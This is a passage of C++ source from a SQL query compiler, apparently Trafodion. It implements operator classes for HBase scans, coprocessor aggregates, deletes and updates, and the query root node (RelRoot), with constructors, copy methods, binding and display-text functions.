during optimization) if (getBeginKeyPred().isEmpty() AND getEndKeyPred().isEmpty() AND pathKeys_ AND NOT pathKeys_->getKeyPredicates().isEmpty()) { xlist.insert(pathKeys_->getKeyPredicates().rebuildExprTree()); if (pathKeys_ == partKeys_) llist.insert("key_and_part_key_preds"); else llist.insert("key_predicates"); } } // display part key preds only if different from clustering key preds if (partKeys_ AND pathKeys_ != partKeys_ AND NOT partKeys_->getKeyPredicates().isEmpty()) { xlist.insert(partKeys_->getKeyPredicates().rebuildExprTree()); llist.insert("part_key_predicates"); } if (NOT getBeginKeyPred().isEmpty()) { xlist.insert(getBeginKeyPred().rebuildExprTree()); llist.insert("begin_key"); } if (NOT getEndKeyPred().isEmpty()) { xlist.insert(getEndKeyPred().rebuildExprTree()); llist.insert("end_key"); } // xlist.insert(retrievedCols_.rebuildExprTree(ITM_ITEM_LIST)); // llist.insert("retrieved_cols"); RelExpr::addLocalExpr(xlist,llist); } const Disjuncts& FileScan::getDisjuncts() const { CMPASSERT(disjunctsPtr_ != NULL); return *disjunctsPtr_; } // ----------------------------------------------------------------------- // methods for class HbaseAccess // ----------------------------------------------------------------------- HbaseAccess::HbaseAccess(CorrName &corrName, OperatorTypeEnum otype, CollHeap *oHeap) : FileScan(corrName, NULL, NULL, otype, oHeap), listOfSearchKeys_(oHeap), snpType_(SNP_NONE), retHbaseColRefSet_(oHeap), opList_(oHeap) { accessType_ = SELECT_; uniqueHbaseOper_ = FALSE; uniqueRowsetHbaseOper_ = FALSE; } HbaseAccess::HbaseAccess(CorrName &corrName, TableDesc *tableDesc, IndexDesc *idx, const NABoolean isReverseScan, const Cardinality& baseCardinality, StmtLevelAccessOptions& accessOptions, GroupAttributes * groupAttributesPtr, const ValueIdSet& selectionPredicates, const Disjuncts& disjuncts, const ValueIdSet& generatedCCPreds, OperatorTypeEnum otype, CollHeap *oHeap) : FileScan(corrName, tableDesc, idx, isReverseScan, baseCardinality, 
accessOptions, groupAttributesPtr, selectionPredicates, disjuncts, generatedCCPreds, otype), listOfSearchKeys_(oHeap), snpType_(SNP_NONE), retHbaseColRefSet_(oHeap), opList_(oHeap) { accessType_ = SELECT_; //setTableDesc(tableDesc); uniqueHbaseOper_ = FALSE; uniqueRowsetHbaseOper_ = FALSE; } HbaseAccess::HbaseAccess(CorrName &corrName, NABoolean isRW, NABoolean isCW, CollHeap *oHeap) : FileScan(corrName, NULL, NULL, REL_HBASE_ACCESS, oHeap), isRW_(isRW), isCW_(isCW), listOfSearchKeys_(oHeap), snpType_(SNP_NONE), retHbaseColRefSet_(oHeap), opList_(oHeap) { accessType_ = SELECT_; uniqueHbaseOper_ = FALSE; uniqueRowsetHbaseOper_ = FALSE; } HbaseAccess::HbaseAccess( OperatorTypeEnum otype, CollHeap *oHeap) : FileScan(CorrName(), NULL, NULL, otype, oHeap), listOfSearchKeys_(oHeap), snpType_(SNP_NONE), retHbaseColRefSet_(oHeap), opList_(oHeap) { accessType_ = SELECT_; uniqueHbaseOper_ = FALSE; uniqueRowsetHbaseOper_ = FALSE; } //! HbaseAccess::~HbaseAccess Destructor HbaseAccess::~HbaseAccess() { } //! 
// HbaseAccess::copyTopNode method
// Copy this node's HbaseAccess-specific state onto 'result' (allocating a
// fresh node on outHeap when no derived node is supplied), then delegate
// the remainder of the copy to Scan::copyTopNode().
RelExpr * HbaseAccess::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap)
{
  HbaseAccess *result;

  if (derivedNode == NULL)
    result = new (outHeap) HbaseAccess(REL_HBASE_ACCESS, outHeap);
  else
    result = (HbaseAccess *) derivedNode;

  //result->corrName_ = corrName_;
  result->accessType_ = accessType_;
  result->isRW_ = isRW_;
  result->isCW_ = isCW_;
  result->setTableDesc(getTableDesc());
  result->setIndexDesc(getIndexDesc());
  //result->setTableDesc(getTableDesc());
  result->listOfSearchKeys_ = listOfSearchKeys_;
  result->retColRefSet_ = retColRefSet_;
  result->uniqueHbaseOper_ = uniqueHbaseOper_;
  result->uniqueRowsetHbaseOper_ = uniqueRowsetHbaseOper_;

  return Scan::copyTopNode(result, outHeap);
  // return BuiltinTableValuedFunction::copyTopNode(result, outHeap);
}

// Build the operator name used in display output, e.g. "trafodion_scan t"
// or "hbase_index_scan ix(t)". An index scan wraps the table name in
// "index(table)" form; a reverse scan adds a "rev " prefix; a sampled
// scan inserts "sample_".
const NAString HbaseAccess::getText() const
{
  NAString op(CmpCommon::statementHeap());
  NAString tname(getTableName().getText(),CmpCommon::statementHeap());

  NAString sampleOpt(CmpCommon::statementHeap());
  if (isSampleScan())
    sampleOpt = "sample_";

  if (getIndexDesc() == NULL OR getIndexDesc()->isClusteringIndex())
    {
      if (isSeabaseTable())
        {
          if (uniqueRowsetHbaseOper())
            (op += "trafodion_vsbb_") += sampleOpt += "scan ";
          else
            (op += "trafodion_") += sampleOpt += "scan ";
        }
      else
        (op += "hbase_") += sampleOpt += "scan ";
    }
  else
    {
      if (isSeabaseTable())
        (op += "trafodion_index_") += sampleOpt += "scan ";
      else
        (op += "hbase_index_") += sampleOpt += "scan ";

      tname = getIndexDesc()->getIndexName().getQualifiedNameAsString()
        + "(" + tname + ")";
    }

  if (getReverseScan())
    op += NAString("rev ");

  return op + tname;
}

// Bind this node: look up the NATable for the target table (error 1388
// if not found), allocate a TableDesc, select the clustering index, and
// let Scan::bindNode() finish the binding.
RelExpr *HbaseAccess::bindNode(BindWA *bindWA)
{
  if (nodeIsBound())
    {
      bindWA->getCurrentScope()->setRETDesc(getRETDesc());
      return this;
    }

  //  CorrName &corrName = (CorrName&)getCorrName();
  CorrName &corrName = getTableName();
  NATable * naTable = NULL;

  naTable = bindWA->getSchemaDB()->getNATableDB()->
    get(&corrName.getExtendedQualNameObj());

  if ( !naTable || bindWA->errStatus())
    {
      *CmpCommon::diags()
        << DgSqlCode(-1388)
        << DgTableName(corrName.getExposedNameAsAnsiString());
      bindWA->setErrStatus();
      return this;
    }

  // Allocate a TableDesc and attach it to this.
  //
  TableDesc * td = bindWA->createTableDesc(naTable, corrName);
  if (! td || bindWA->errStatus())
    return this;

  setTableDesc(td);
  setIndexDesc(td->getClusteringIndex());

  if (bindWA->errStatus())
    return this;

  RelExpr * re = NULL;

  //  re = BuiltinTableValuedFunction::bindNode(bindWA);
  re = Scan::bindNode(bindWA);
  if (bindWA->errStatus())
    return this;

  return re;
}

// Everything this physical scan can produce: the index columns plus the
// per-row HBase timestamp and version pseudo-columns.
void HbaseAccess::getPotentialOutputValues(
     ValueIdSet & outputValues) const
{
  outputValues.clear();
  // since this is a physical operator, it only generates the index columns
  outputValues.insertList( getIndexDesc()->getIndexColumns() );

  outputValues.insertList( getTableDesc()->hbaseTSList() );
  outputValues.insertList( getTableDesc()->hbaseVersionList() );
} // HbaseAccess::getPotentialOutputValues()

// Synthesize estimated logical properties for this input; a placeholder
// cardinality of 10 is used for now.
void HbaseAccess::synthEstLogProp(const EstLogPropSharedPtr& inputEstLogProp)
{
  if (getGroupAttr()->isPropSynthesized(inputEstLogProp))
    return;

  // Create a new Output Log Property with cardinality of 10 for now.
  EstLogPropSharedPtr myEstProps(new (HISTHEAP) EstLogProp(10));

  getGroupAttr()->addInputOutputLogProp(inputEstLogProp, myEstProps);
} // HbaseAccess::synthEstLogProp

void HbaseAccess::synthLogProp(NormWA * normWAPtr)
{
  // Check to see whether this GA has already been associated
  // with a logExpr for synthesis.  If so, no need to resynthesize
  // for this equivalent log. expression.
  if (getGroupAttr()->existsLogExprForSynthesis()) return;

  RelExpr::synthLogProp(normWAPtr);
} // HbaseAccess::synthLogProp()

// -----------------------------------------------------------------------
// methods for class HBaseAccessCoProcAggr
// -----------------------------------------------------------------------

// Full constructor: a coprocessor-aggregate access over the given table/
// index with the given aggregate expression; access type is COPROC_AGGR_.
HbaseAccessCoProcAggr::HbaseAccessCoProcAggr(CorrName &corrName,
                                             ValueIdSet &aggregateExpr,
                                             TableDesc *tableDesc,
                                             IndexDesc *idx,
                                             const NABoolean isReverseScan,
                                             const Cardinality& baseCardinality,
                                             StmtLevelAccessOptions& accessOptions,
                                             GroupAttributes * groupAttributesPtr,
                                             const ValueIdSet& selectionPredicates,
                                             const Disjuncts& disjuncts,
                                             CollHeap *oHeap)
  : HbaseAccess(corrName, tableDesc, idx, isReverseScan, baseCardinality,
                accessOptions, groupAttributesPtr, selectionPredicates,
                disjuncts, ValueIdSet(), REL_HBASE_COPROC_AGGR),
    aggregateExpr_(aggregateExpr)
{
  accessType_ = COPROC_AGGR_;
}

// Constructor used when only the table name and aggregate expression are
// known.
HbaseAccessCoProcAggr::HbaseAccessCoProcAggr(CorrName &corrName,
                                             ValueIdSet &aggregateExpr,
                                             CollHeap *oHeap)
  : HbaseAccess(corrName, REL_HBASE_COPROC_AGGR, oHeap),
    aggregateExpr_(aggregateExpr)
{
  accessType_ = COPROC_AGGR_;
}

// Empty-node constructor (used when copying).
HbaseAccessCoProcAggr::HbaseAccessCoProcAggr(
                                             CollHeap *oHeap)
  : HbaseAccess(REL_HBASE_COPROC_AGGR, oHeap)
{
  accessType_ = SELECT_;
  uniqueHbaseOper_ = FALSE;
  uniqueRowsetHbaseOper_ = FALSE;
}

//! HbaseAccessCoProcAggr::~HbaseAccessCoProcAggr Destructor
HbaseAccessCoProcAggr::~HbaseAccessCoProcAggr()
{
}

//!
// HbaseAccessCoProcAggr::copyTopNode method
// Copy the aggregate expression, then let HbaseAccess copy the rest.
RelExpr * HbaseAccessCoProcAggr::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap)
{
  HbaseAccessCoProcAggr *result;

  if (derivedNode == NULL)
    result = new (outHeap) HbaseAccessCoProcAggr(outHeap);
  else
    result = (HbaseAccessCoProcAggr *) derivedNode;

  result->aggregateExpr_ = aggregateExpr_;

  return HbaseAccess::copyTopNode(result, outHeap);
}

// Display text: "hbase_coproc_aggr <table>".
const NAString HbaseAccessCoProcAggr::getText() const
{
  NAString op(CmpCommon::statementHeap());
  NAString tname(getTableName().getText(),CmpCommon::statementHeap());

  op += "hbase_coproc_aggr ";

  return op + tname;
}

// Binding is entirely delegated to HbaseAccess::bindNode().
RelExpr *HbaseAccessCoProcAggr::bindNode(BindWA *bindWA)
{
  if (nodeIsBound())
    {
      bindWA->getCurrentScope()->setRETDesc(getRETDesc());
      return this;
    }

  RelExpr * re = NULL;

  re = HbaseAccess::bindNode(bindWA);
  if (bindWA->errStatus())
    return this;

  return re;
}

// Only the aggregate results are produced by this operator.
void HbaseAccessCoProcAggr::getPotentialOutputValues(
     ValueIdSet & outputValues) const
{
  outputValues.clear();

  outputValues += aggregateExpr();
} // HbaseAccessCoProcAggr::getPotentialOutputValues()

// Synthesize physical properties: a single-partition plan executing in
// the master.
PhysicalProperty* HbaseAccessCoProcAggr::synthPhysicalProperty(const Context* myContext,
                                                               const Lng32    planNumber,
                                                               PlanWorkSpace  *pws)
{
  //----------------------------------------------------------
  // Create a node map with a single, active, wild-card entry.
  //----------------------------------------------------------
  NodeMap* myNodeMap = new(CmpCommon::statementHeap())
    NodeMap(CmpCommon::statementHeap(),
            1,
            NodeMapEntry::ACTIVE);

  //------------------------------------------------------------
  // Synthesize a partitioning function with a single partition.
  //------------------------------------------------------------
  PartitioningFunction* myPartFunc = new(CmpCommon::statementHeap())
    SinglePartitionPartitioningFunction(myNodeMap);

  PhysicalProperty * sppForMe = new(CmpCommon::statementHeap())
    PhysicalProperty(myPartFunc,
                     EXECUTE_IN_MASTER,
                     SOURCE_VIRTUAL_TABLE);

  // remove anything that's not covered by the group attributes
  sppForMe->enforceCoverageByGroupAttributes (getGroupAttr()) ;

  return sppForMe;
} // HbaseAccessCoProcAggr::synthPhysicalProperty()

// -----------------------------------------------------------------------
// methods for class HbaseDelete
// -----------------------------------------------------------------------

// All constructors mark the generic-update node as an HBase operation.
HbaseDelete::HbaseDelete(CorrName &corrName,
                         RelExpr *scan,
                         CollHeap *oHeap)
  : Delete(corrName, NULL, REL_HBASE_DELETE, scan, NULL, NULL, NULL, oHeap),
    corrName_(corrName),
    listOfSearchKeys_(oHeap)
{
  hbaseOper() = TRUE;
}

HbaseDelete::HbaseDelete(CorrName &corrName,
                         TableDesc *tableDesc,
                         CollHeap *oHeap)
  : Delete(corrName, tableDesc, REL_HBASE_DELETE, NULL, NULL, NULL, NULL,oHeap),
    corrName_(corrName),
    listOfSearchKeys_(oHeap)
{
  hbaseOper() = TRUE;
}

HbaseDelete::HbaseDelete( CollHeap *oHeap)
  : Delete(CorrName(""), NULL, REL_HBASE_DELETE, NULL, NULL, NULL, NULL, oHeap),
    listOfSearchKeys_(oHeap)
{
  hbaseOper() = TRUE;
}

//! HbaseDelete::~HbaseDelete Destructor
HbaseDelete::~HbaseDelete()
{
}

//!
HbaseDelete::copyTopNode method RelExpr * HbaseDelete::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { HbaseDelete *result; if (derivedNode == NULL) result = new (outHeap) HbaseDelete(corrName_, getTableDesc(), outHeap); else result = (HbaseDelete *) derivedNode; result->corrName_ = corrName_; result->setTableDesc(getTableDesc()); result->listOfSearchKeys_ = listOfSearchKeys_; result->retColRefSet_ = retColRefSet_; return Delete::copyTopNode(result, outHeap); } RelExpr *HbaseDelete::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } RelExpr * re = NULL; re = Delete::bindNode(bindWA); if (bindWA->errStatus()) return this; return re; } //! HbaseDelete::getText method const NAString HbaseDelete::getText() const { NABoolean isSeabase = (getTableDesc() && getTableDesc()->getNATable() ? getTableDesc()->getNATable()->isSeabaseTable() : FALSE); NAString text; if (NOT isSeabase) text = "hbase_"; else text = "trafodion_"; if (uniqueRowsetHbaseOper()) text += "vsbb_"; text += "delete"; return text; } Int32 HbaseDelete::getArity() const { return 0; } void HbaseDelete::getPotentialOutputValues( ValueIdSet & outputValues) const { outputValues.clear(); // since this is a physical operator, it only generates the index columns if (getScanIndexDesc()) outputValues.insertList(getScanIndexDesc()->getIndexColumns()); } // HbaseDelete::getPotentialOutputValues() // ----------------------------------------------------------------------- // methods for class HbaseUpdate // ----------------------------------------------------------------------- HbaseUpdate::HbaseUpdate(CorrName &corrName, RelExpr *scan, CollHeap *oHeap) : UpdateCursor(corrName, NULL, REL_HBASE_UPDATE, scan, oHeap), corrName_(corrName), listOfSearchKeys_(oHeap) { hbaseOper() = TRUE; } HbaseUpdate::HbaseUpdate(CorrName &corrName, TableDesc *tableDesc, CollHeap *oHeap) : UpdateCursor(corrName, tableDesc, REL_HBASE_UPDATE, NULL, oHeap), 
corrName_(corrName), listOfSearchKeys_(oHeap) { hbaseOper() = TRUE; } HbaseUpdate::HbaseUpdate( CollHeap *oHeap) : UpdateCursor(CorrName(""), NULL, REL_HBASE_UPDATE, NULL, oHeap), listOfSearchKeys_(oHeap) { hbaseOper() = TRUE; } //! HbaseUpdate::~HbaseUpdate Destructor HbaseUpdate::~HbaseUpdate() { } //! HbaseUpdate::copyTopNode method RelExpr * HbaseUpdate::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { HbaseUpdate *result; if (derivedNode == NULL) result = new (outHeap) HbaseUpdate(corrName_, getTableDesc(), outHeap); else result = (HbaseUpdate *) derivedNode; result->corrName_ = corrName_; result->setTableDesc(getTableDesc()); result->listOfSearchKeys_ = listOfSearchKeys_; result->retColRefSet_ = retColRefSet_; return Update::copyTopNode(result, outHeap); } RelExpr *HbaseUpdate::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } RelExpr * re = NULL; re = Update::bindNode(bindWA); if (bindWA->errStatus()) return this; return re; } //! HbaseUpdate::getText method const NAString HbaseUpdate::getText() const { NABoolean isSeabase = (getTableDesc() ? getTableDesc()->getNATable()->isSeabaseTable() : FALSE); NAString text; if (isMerge()) { text = (isSeabase ? 
"trafodion_merge" : "hbase_merge"); } else { if (NOT isSeabase) text = "hbase_"; else text = "trafodion_"; if (uniqueRowsetHbaseOper()) text += "vsbb_"; text += "update"; } return text; } Int32 HbaseUpdate::getArity() const { return 0; } void HbaseUpdate::getPotentialOutputValues( ValueIdSet & outputValues) const { outputValues.clear(); // Include the index columns from the original Scan, if any if (getScanIndexDesc()) outputValues.insertList(getScanIndexDesc()->getIndexColumns()); // Include the index columns from the updated table, if any if (getIndexDesc()) outputValues.insertList (getIndexDesc()->getIndexColumns()); } // HbaseUpdate::getPotentialOutputValues() // ----------------------------------------------------------------------- // Member functions for DP2 Scan // ----------------------------------------------------------------------- DP2Scan::DP2Scan(const CorrName& tableName, TableDesc * tableDescPtr, const IndexDesc *indexDescPtr, const NABoolean isReverseScan, const Cardinality& baseCardinality, StmtLevelAccessOptions& accessOpts, GroupAttributes * groupAttributesPtr, const ValueIdSet& selectionPredicates, const Disjuncts& disjuncts) : FileScan(tableName, tableDescPtr, indexDescPtr, isReverseScan, baseCardinality, accessOpts, groupAttributesPtr, selectionPredicates, disjuncts, ValueIdSet()) { } // -------------------------------------------------- // methods for class Describe // -------------------------------------------------- void Describe::getPotentialOutputValues(ValueIdSet & outputValues) const { outputValues.clear(); // // Assign the set of columns that belong to the index to be scanned // as the output values that can be produced by this scan. 
// outputValues.insertList( getTableDesc()->getClusteringIndex()->getIndexColumns() ); } // Describe::getPotentialOutputValues() // ----------------------------------------------------------------------- // methods for class RelRoot // ----------------------------------------------------------------------- RelRoot::RelRoot(RelExpr *input, OperatorTypeEnum otype, ItemExpr *compExpr, ItemExpr *orderBy, ItemExpr *updateCol, RelExpr *reqdShape, CollHeap *oHeap) : RelExpr(otype, input, NULL, oHeap), compExprTree_(compExpr), orderByTree_(orderBy), updateColTree_(updateCol), reqdShape_(reqdShape), viewStoiList_(CmpCommon::statementHeap()), ddlStoiList_(CmpCommon::statementHeap()), stoiUdrList_(CmpCommon::statementHeap()), udfList_(CmpCommon::statementHeap()), securityKeySet_(CmpCommon::statementHeap()), trueRoot_(FALSE), subRoot_(FALSE), displayTree_(FALSE), outputVarCnt_(-1), inputVarTree_(NULL), outputVarTree_(NULL), updatableSelect_(TRUE), updateCurrentOf_(FALSE), currOfCursorName_(NULL), rollbackOnError_(FALSE), readOnlyTransIsOK_(FALSE), needFirstSortedRows_(FALSE), numSimpleVar_(0), numHostVar_(0), childOperType_(NO_OPERATOR_TYPE), hostArraysArea_(NULL), assignmentStTree_(NULL), assignList_(NULL), isRootOfInternalRefresh_(FALSE), isQueryNonCacheable_(FALSE), pMvBindContextForScope_(NULL), parentForRowsetReqdOrder_(NULL), isEmptySelectList_(FALSE), isDontOpenNewScope_(FALSE), triggersList_(NULL), spOutParams_(NULL), downrevCompileMXV_(COM_VERS_CURR_PLAN), numExtractStreams_(0), numBMOs_(0), BMOsMemoryUsage_(0), nBMOsMemoryUsage_(0), uninitializedMvList_(NULL), allOrderByRefsInGby_(FALSE), avoidHalloween_(FALSE), containsOnStatementMV_(FALSE), containsLRU_(FALSE), disableESPParallelism_(FALSE), hasOlapFunctions_(FALSE), hasTDFunctions_(FALSE), isAnalyzeOnly_(FALSE), hasMandatoryXP_(FALSE), partReqType_(ANY_PARTITIONING), partitionByTree_(NULL), predExprTree_(NULL), firstNRowsParam_(NULL), flags_(0) { accessOptions().accessType() = 
TransMode::ACCESS_TYPE_NOT_SPECIFIED_; accessOptions().lockMode() = LOCK_MODE_NOT_SPECIFIED_; isCIFOn_ = FALSE; } RelRoot::RelRoot(RelExpr *input, TransMode::AccessType at, LockMode lm, OperatorTypeEnum otype, ItemExpr *compExpr, ItemExpr *orderBy, ItemExpr *updateCol, RelExpr *reqdShape, CollHeap *oHeap) : RelExpr(otype, input, NULL, oHeap), compExprTree_(compExpr), orderByTree_(orderBy), updateColTree_(updateCol), reqdShape_(reqdShape), viewStoiList_(CmpCommon::statementHeap()), ddlStoiList_(CmpCommon::statementHeap()), stoiUdrList_(CmpCommon::statementHeap()), udfList_(CmpCommon::statementHeap()), securityKeySet_(CmpCommon::statementHeap()), trueRoot_(FALSE), subRoot_(FALSE), displayTree_(FALSE), outputVarCnt_(-1), inputVarTree_(NULL), outputVarTree_(NULL), updatableSelect_(TRUE), updateCurrentOf_(FALSE), currOfCursorName_(NULL), rollbackOnError_(FALSE), readOnlyTransIsOK_(FALSE), needFirstSortedRows_(FALSE), numSimpleVar_(0), numHostVar_(0), childOperType_(NO_OPERATOR_TYPE), hostArraysArea_(NULL), assignmentStTree_(NULL), assignList_(NULL), isRootOfInternalRefresh_(FALSE), isQueryNonCacheable_(FALSE), pMvBindContextForScope_(NULL), parentForRowsetReqdOrder_(NULL), isEmptySelectList_(FALSE), isDontOpenNewScope_(FALSE), triggersList_(NULL), spOutParams_(NULL), downrevCompileMXV_(COM_VERS_CURR_PLAN), numExtractStreams_(0), numBMOs_(0), BMOsMemoryUsage_(0), nBMOsMemoryUsage_(0), uninitializedMvList_(NULL), allOrderByRefsInGby_(FALSE), avoidHalloween_(FALSE), containsOnStatementMV_(FALSE), containsLRU_(FALSE), disableESPParallelism_(FALSE), hasOlapFunctions_(FALSE), hasTDFunctions_(FALSE), isAnalyzeOnly_(FALSE), hasMandatoryXP_(FALSE), partReqType_(ANY_PARTITIONING), partitionByTree_(NULL), predExprTree_(NULL), firstNRowsParam_(NULL), flags_(0) { accessOptions().accessType() = at; accessOptions().lockMode() = lm; isCIFOn_ = FALSE; } // Why not just use the default copy ctor that C++ provides automatically, ## // rather than having to maintain this??? 
// ## Is it because of the "numXXXVar_(0)" lines below, ##
// ## or should those be "numXXXVar_(other.numXXXVar_)" ? ##

// RelRoot copy constructor. Most members are copied from 'other';
// note the deliberate exceptions below (numSimpleVar_/numHostVar_ are
// reset to 0 and flagged as possible bugs, spOutParams_ is not shared,
// and isAnalyzeOnly_ is reset to FALSE).
RelRoot::RelRoot(const RelRoot & other)
  : RelExpr(REL_ROOT, other.child(0)),
    compExprTree_(other.compExprTree_),
    orderByTree_(other.orderByTree_),
    updateColTree_(other.updateColTree_),
    reqdShape_(other.reqdShape_),
    viewStoiList_(other.viewStoiList_),
    ddlStoiList_(other.ddlStoiList_),
    stoiUdrList_(other.stoiUdrList_),
    udfList_(other.udfList_),
    securityKeySet_(other.securityKeySet_),
    trueRoot_(other.trueRoot_),
    subRoot_(other.subRoot_),
    displayTree_(other.displayTree_),
    outputVarCnt_(other.outputVarCnt_),
    inputVarTree_(other.inputVarTree_),
    outputVarTree_(other.outputVarTree_),
    updatableSelect_(other.updatableSelect_),
    updateCurrentOf_(other.updateCurrentOf_),
    currOfCursorName_(other.currOfCursorName_),
    rollbackOnError_(other.rollbackOnError_),
    readOnlyTransIsOK_(other.readOnlyTransIsOK_),
    needFirstSortedRows_(other.needFirstSortedRows_),
    isRootOfInternalRefresh_(other.isRootOfInternalRefresh_),
    isQueryNonCacheable_(other.isQueryNonCacheable_),
    pMvBindContextForScope_(other.pMvBindContextForScope_),
    isEmptySelectList_(other.isEmptySelectList_),
    isDontOpenNewScope_(other.isDontOpenNewScope_),
    //    oltOptInfo_(other.oltOptInfo_),
    numSimpleVar_(0),                      //## bug?
    numHostVar_(0),                        //## bug?
    childOperType_(other.childOperType_),
    hostArraysArea_(other.hostArraysArea_),
    assignmentStTree_(other.assignmentStTree_),
    assignList_(other.assignList_),
    triggersList_(other.triggersList_),
    compExpr_(other.compExpr_),
    reqdOrder_(other.reqdOrder_),
    partArrangement_(other.partArrangement_),
    updateCol_(other.updateCol_),
    inputVars_(other.inputVars_),
    accessOptions_(other.accessOptions_),
    pkeyList_(other.pkeyList_),
    rowsetReqdOrder_(other.rowsetReqdOrder_),
    parentForRowsetReqdOrder_(other.parentForRowsetReqdOrder_),
    spOutParams_ (NULL),     // Raj P - 12/2000 - stored procedures (for java)
    downrevCompileMXV_(COM_VERS_CURR_PLAN),
    uninitializedMvList_(other.uninitializedMvList_),
    allOrderByRefsInGby_(other.allOrderByRefsInGby_),
    numExtractStreams_(other.numExtractStreams_),
    numBMOs_(other.numBMOs_),
    BMOsMemoryUsage_(other.BMOsMemoryUsage_),
    nBMOsMemoryUsage_(other.nBMOsMemoryUsage_),
    avoidHalloween_(other.avoidHalloween_),
    disableESPParallelism_(other.disableESPParallelism_),
    containsOnStatementMV_(other.containsOnStatementMV_),
    containsLRU_(other.containsLRU_),
    hasOlapFunctions_(other.hasOlapFunctions_),
    hasTDFunctions_(other.hasTDFunctions_ ),
    isAnalyzeOnly_(FALSE),
    hasMandatoryXP_(other.hasMandatoryXP_),
    partReqType_(other.partReqType_),
    partitionByTree_(other.partitionByTree_),
    isCIFOn_(other.isCIFOn_),
    predExprTree_(other.predExprTree_),
    firstNRowsParam_(other.firstNRowsParam_),
    flags_(other.flags_)
{
  oltOptInfo() = ((RelRoot&)other).oltOptInfo();
  setRETDesc(other.getRETDesc());
}

RelRoot::~RelRoot()
{
  // Explicitly deleting our members is deliberately not being done --
  // we should allocate all RelExpr's on the appropriate heap
  // (as a NABasicObject) and free the (stmt) heap all in one blow.
  // delete compExprTree_;
  // delete orderByTree_;
  // delete reqdShape_;
  // delete inputVarTree_;
}

Int32 RelRoot::getArity() const
{
  return 1;
}

void RelRoot::getPotentialOutputValues(ValueIdSet & outputValues) const
{
  outputValues.clear();
  //
  // Assign the select list as the outputs
  //
  outputValues.insertList(compExpr());
} // RelRoot::getPotentialOutputValues()

// Push covered expressions down to the child; the root itself keeps no
// predicates (asserted at the end).
void RelRoot::pushdownCoveredExpr(const ValueIdSet & outputExpr,
                                  const ValueIdSet & newExternalInputs,
                                  ValueIdSet & predicatesOnParent,
                                  const ValueIdSet * setOfValuesReqdByParent,
                                  Lng32 //childIndex ignored
                                  )
{
  //---------------------------------------------------------------------
  // case 10-030708-7671: In the case of a cast, the RelRoot operator
  // needs to ask for original expression it is casting; if it asks for
  // the cast expression, the child may be incapable of producing it. For
  // example, a nested join operator can't produce the cast expression,
  // unless produced by its children
  //---------------------------------------------------------------------
  ValueIdSet originalOutputs = getGroupAttr()->getCharacteristicOutputs();
  ValueIdSet updateOutputs(originalOutputs);
  updateOutputs.replaceCastExprWithOriginal(originalOutputs, this);

  ValueIdSet myCharInput = getGroupAttr()->getCharacteristicInputs();

  // since the orderby list is not a subset of the select list include it.
  ValueIdSet allMyExpr;
  ValueIdList orderByList = reqdOrder();
  allMyExpr.insertList(orderByList);

  // add the primary key columns, if they are to be returned.
  if (updatableSelect() == TRUE)
    {
      allMyExpr.insertList(pkeyList());
    }

  // ---------------------------------------------------------------------
  RelExpr::pushdownCoveredExpr(updateOutputs,
                               myCharInput,
                               predicatesOnParent,
                               &allMyExpr
                               );

  // All expressions should have been pushed
  CMPASSERT(predicatesOnParent.isEmpty());
} // RelRoot::pushdownCoveredExpr

const NAString RelRoot::getText() const
{
  NAString result("root");

#ifdef DEBUG_TRIGGERS
  char totalNodes[20];
  sprintf(totalNodes, "(total %d nodes)", nodeCount());
  result += totalNodes;

  if (isDontOpenNewScope())
    result += "(no_scope)";
  if (isEmptySelectList())
    result += "(empty_select_list)";
#endif

  return result;
}

HashValue RelRoot::topHash()
{
  HashValue result = RelExpr::topHash();

  // it's not (yet) needed to produce a really good hash value for this node
  result ^= compExpr_.entries();
  result ^= inputVars_.entries();
  // result ^= compExpr_;
  // result ^= inputVars_;

  return result;
}

NABoolean RelRoot::duplicateMatch(const RelExpr & other) const
{
  if (!RelExpr::duplicateMatch(other))
    return FALSE;

  RelRoot &o = (RelRoot &) other;

  if (NOT (compExpr_ == o.compExpr_) OR
      NOT (inputVars_ == o.inputVars_))
    return FALSE;

  if (avoidHalloween_ != o.avoidHalloween_)
    return FALSE;

  if (disableESPParallelism_ != o.disableESPParallelism_)
    return FALSE;

  if (isAnalyzeOnly_ != o.isAnalyzeOnly_)
    return FALSE;

  return TRUE;
}

// Copy this root node, deep-copying the various parse trees and
// shallow-copying the bound value lists.
RelExpr * RelRoot::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap)
{
  RelRoot *result;

  if (derivedNode == NULL)
    result = new (outHeap) RelRoot(NULL,
                                   getOperatorType(),
                                   NULL,
                                   NULL,
                                   NULL,
                                   NULL,
                                   outHeap);
  else
    result = (RelRoot *) derivedNode;

  if (compExprTree_ != NULL)
    result->compExprTree_ = compExprTree_->copyTree(outHeap)->castToItemExpr();

  if (inputVarTree_ != NULL)
    result->inputVarTree_ = inputVarTree_->copyTree(outHeap)->castToItemExpr();

  if (outputVarTree_ != NULL)
    result->outputVarTree_ = outputVarTree_->copyTree(outHeap)->castToItemExpr();

  if (predExprTree_ != NULL)
    result->predExprTree_ = predExprTree_->copyTree(outHeap)->castToItemExpr();

  result->compExpr_ = compExpr_;
  result->inputVars_ = inputVars_;
  result->accessOptions_ = accessOptions_;
  result->updatableSelect_ = updatableSelect_;
  result->updateCurrentOf_ = updateCurrentOf_;

  if (currOfCursorName())
    result->currOfCursorName_ = currOfCursorName()->copyTree(outHeap)->castToItemExpr();

  result->rollbackOnError_ = rollbackOnError_;
  result->isEmptySelectList_ = isEmptySelectList_;
  result->isDontOpenNewScope_ = isDontOpenNewScope_;
  result->oltOptInfo() = oltOptInfo();
  result->childOperType_ = childOperType_;
  result->rowsetReqdOrder_ = rowsetReqdOrder_;
  result->parentForRowsetReqdOrder_ = parentForRowsetReqdOrder_;

  // Raj P - 12/2000 stored procedures (for java)
  if ( spOutParams_ )
    {
      result->spOutParams_ = new ItemExprList (outHeap);
      (*result->spOutParams_) = *spOutParams_;
    }

  if( uninitializedMvList_ )
    {
      result->uninitializedMvList_ = new UninitializedMvNameList (outHeap);
      result->uninitializedMvList_->insert( *uninitializedMvList_ );
    }

  result->setDownrevCompileMXV(getDownrevCompileMXV());
  result->numExtractStreams_ = numExtractStreams_;
